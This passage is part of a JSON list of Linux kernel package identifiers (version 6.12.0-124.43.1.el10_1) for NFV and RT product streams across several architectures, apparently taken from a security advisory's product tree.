"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
